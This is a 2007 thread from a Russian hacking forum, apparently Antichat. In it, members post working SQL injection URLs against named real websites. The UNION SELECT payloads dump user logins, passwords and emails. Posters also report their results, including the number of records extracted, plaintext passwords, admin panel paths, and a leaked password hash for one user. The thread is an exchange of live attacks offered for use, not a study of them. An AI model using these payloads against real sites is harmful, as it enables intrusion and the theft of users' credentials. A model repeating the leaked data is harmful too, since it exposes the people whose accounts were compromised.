08.05.2007, 06:50
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
www.dfalink.com
Код:
http://www.dfalink.com/group.php?id=-775+union+select+1,password,zip,4,5,email,id,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,24,24,25,26,27+from+members/*
лимит в помощь
www.trikhin.ru
Код:
http://www.trikhin.ru/index.php?rn_id=-39+union+select+1,2,3,4,5,6,7+admin/*
таблицa: user
www.e30club.ru
Код:
http://www.e30club.ru/index.php?id=-13+union+select+1,2,3,4,5,6,7+from+ds_e30club_page/*
|
|
|
08.05.2007, 18:29
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
mr.The,
Код:
http://artbridge.ru/show_concurs.php?id=-1+union+select+1,2,3,concat(login,char(58),password,char(58),email,char(58)),5,6,7,8,9,10,11,12,13,14+from+users+limit+10/*
459 записей.
|
|
|
|
08.05.2007, 19:53
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
novdelo.ru
Код:
http://www.novdelo.ru/advertnews.php?id=-1+union+select+1,2,concat(login,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14+from+users/*
|
|
|
|
08.05.2007, 20:02
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
Провел на форуме:
4778940
Репутация:
1257
|
|
Joker-jar
ээээ у меня выдаёт
Database error in vCard Lite:
Invalid SQL: SELECT * FROM konkurses WHERE id=-1 union select 1,2,3,concat(login,char(58),passwor d,char(58),email,char(58)),5,6,7,8,9,10,11,12,13,1 4 from users limit 10/*
mysql error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'd,char(58),email,char(58)),5,6,7,8,9,10,11,12,13, 1 4 from user
mysql error number: 1064
Date: 2007/05/08 - 07:57:20 PM
Script: /show_concurs.php?id=-1+union+select+1,2,3,concat(login,char(58),passwor %20%20d,char(58),email,char(58)),5,6,7,8,9,10,11,1 2,13,1%20%204+from+users+limit+10/*
Referer:
|
|
|
|
08.05.2007, 23:31
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 09.05.2007 в 11:25..
|
|
|
|
09.05.2007, 00:11
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
\\скуль от меня\\
Код:
http://www.autohalle24.de/include/include.php?id=-019+union+select+char(1),concat_ws(0x3a,user(),version(),database()),null,null,null/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
09.05.2007, 01:11
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
Константин, готово
со 199 по эту.
|
|
|
|
09.05.2007, 11:34
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Выводит юзеров и пассы (в открытом виде). Так же мыла. Админа не нашёл, хотя особо не искал.
http://www.sota1.ru/week_news.php3?News_id=-17012+union+select+1,2,3,4,5,6,7,concat(login,0x3a ,password,0x3a,email),9+from+user+limit+1,1
Открыт доступ к таблицам user & users. (они идентичны). Закрыт доступ к таблицам mysql.user & mysql.users.
Админка: http://www.sota1.ru/phoneadmin
Форум: http://www.sota1.ru/phorum
К админке пассы выводимые из таблицы user конечно не подходят. Таблицы phorum.user & phpbb.user тоже закрыты. |
|
|
|
09.05.2007, 11:52
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Сообщение от [sL1p]
Открыт доступ к таблицам user & users. (они идентичны). Закрыт доступ к таблицам mysql.user & mysql.users.
Таблиц mysql.user & mysql.users просто - напросто не существует в этой базе данных
К админке пассы выводимые из таблицы user конечно не подходят. Таблицы phorum.user & phpbb.user тоже закрыты.
phorum.user & phpbb.user таких тоже не существует.
Код:
http://www.sota1.ru/week_news.php3?News_id=-17012+union+select+1,2,3,4,5,6,7,concat(username,char(58),user_password,char(58),user_icq),9+from+phpbb_users+limit+1,1/*
MobileServ: d79096188b670c2f81b7001f73801117
_________________________
добавление от Hawkins
MobileServ:d79096188b670c2f81b7001f73801117 - passw
Последний раз редактировалось _Pantera_; 11.05.2007 в 01:07..
|
|
|
|
10.05.2007, 21:54
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Идею дал, дораскрутите сами
Код:
http://triplebuffer.devmaster.net/file.php?id=-7+union+select+1,2,convert(version()+using+latin1)/*&page=2
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
